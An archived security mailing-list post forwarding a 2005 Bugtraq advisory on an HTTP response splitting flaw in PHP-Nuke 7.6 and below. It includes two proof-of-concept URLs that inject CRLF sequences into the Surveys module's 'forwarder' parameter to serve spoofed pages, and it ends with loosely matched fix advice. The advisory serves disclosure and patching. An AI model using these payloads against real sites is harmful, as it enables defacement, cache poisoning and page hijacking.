Skip to Content.
Sympa Menu

sm-security - [SM-Security] FW: [Http Response Splitting Vulnerability In PHP-NUKE 7.6 and below]

sm-security AT lists.ibiblio.org

Subject: Security bugs are reported here via bugzilla

List archive

Chronological Thread  
  • From: Andrew <afrayedknot AT thefrayedknot.armory.com>
  • To: sm-security AT lists.ibiblio.org
  • Subject: [SM-Security] FW: [Http Response Splitting Vulnerability In PHP-NUKE 7.6 and below]
  • Date: Fri, 15 Apr 2005 18:23:53 -0700

We have version 7.0 in our grimoires so it appears we're vulnerable.

----- Forwarded message from dcrab <dcrab AT hackerscenter.com> -----

Delivered-To: afrayedknot AT thefrayedknot.armory.com
Delivered-To: mailing list bugtraq AT securityfocus.com
Delivered-To: moderator for bugtraq AT securityfocus.com
Date: 16 Apr 2005 03:30:18 -0000
X-Mailer: MIME-tools 5.411 (Entity 5.404)
From: dcrab <dcrab AT hackerscenter.com>
To: bugtraq AT securityfocus.com
Subject: Http Response Splitting Vulnerability In PHP-NUKE 7.6 and below
X-Bogosity: Ham, tests=bogofilter, spamicity=0.000000, version=0.93.3.1
X-Spam-Level:
X-Spam-Status: No, score=-14.4 required=5.0 tests=AWL,BAYES_00,
DATE_IN_FUTURE_06_12,DNS_FROM_RFC_POST,USER_IN_DEF_WHITELIST
autolearn=no version=3.0.2



Dcrab 's Security Advisory
[Hsc Security Group] http://www.hackerscenter.com/
[dP Security] http://digitalparadox.org/

Get Dcrab's Services to audit your Web servers, scripts, networks, etc. Learn
more at http://www.digitalparadox.org/services.ah

Severity: High
Title: Http Response Splitting Vulnerability In PHP-NUKE 7.6 and below
Date: 15/04/2005

Vendor: Php-Nuke
Vendor Website: http://www.phpnuke.org
Summary: There are, http response splitting vulnerability in php-nuke 7.6 and
below.

Proof of Concept Exploits:

MORE DETAILS OF THIS SORT OF BUG CAN BE FOUND AT
www.digitalparadox.org/papers.ah

A simple POC can be as follows,

http://localhost/modules.php?name=Surveys&pollID=1&forwarder=%0d%0a%0d%0a%3Chtml%3EHELLO
I AM VULNERABLE TO HTTP RESPONSE
SPLITTING%3C/html%3E&voteID=1&voteID=2&voteID=3&voteID=4&voteID=5

A more serious version involving Cross user defacement, cache poisoning and
page hijacking can be,

http://localhost/modules.php?name=Surveys&pollID=1&forwarder=%0d%0a%0d%0a%3Chtml%3E<title>This
is a spoofed site </title> <body bgcolor=black><font size=10 color=blue>
Welcome to my PHP Nuke Website, This is a spoofed page that you are seeing
and can be used for great evils details about which can be read in
http://www.digitalparadox.org/papers.ah Http Response Splitting by Diabolic
Crab. </center> Feel free to contact me about this vulnerablitiy at dcrab
{at} hackerscenter [dot] com<font
color=black>%3C/html%3E&voteID=1&voteID=2&voteID=3&voteID=4&voteID=5


Possible Fixes: The usage of htmlspeacialchars(), mysql_escape_string(),
mysql_real_escape_string() and other functions for input validation before
passing user input to the mysql database, or before echoing data on the
screen, would solve these problems.

Keep your self updated, Rss feed at: http://digitalparadox.org/rss.ah

Author:
These vulnerabilties have been found and released by Diabolic Crab, Email:
dcrab[AT|NOSPAM]hackerscenter[DOT|NOSPAM]com, please feel free to contact me
regarding these vulnerabilities. You can find me at,
http://www.hackerscenter.com or http://digitalparadox.org/. Lookout for my
soon to come out book on Secure coding with php.

----- End forwarded message -----



  • [SM-Security] FW: [Http Response Splitting Vulnerability In PHP-NUKE 7.6 and below], Andrew, 04/15/2005

Archive powered by MHonArc 2.6.24.

Top of Page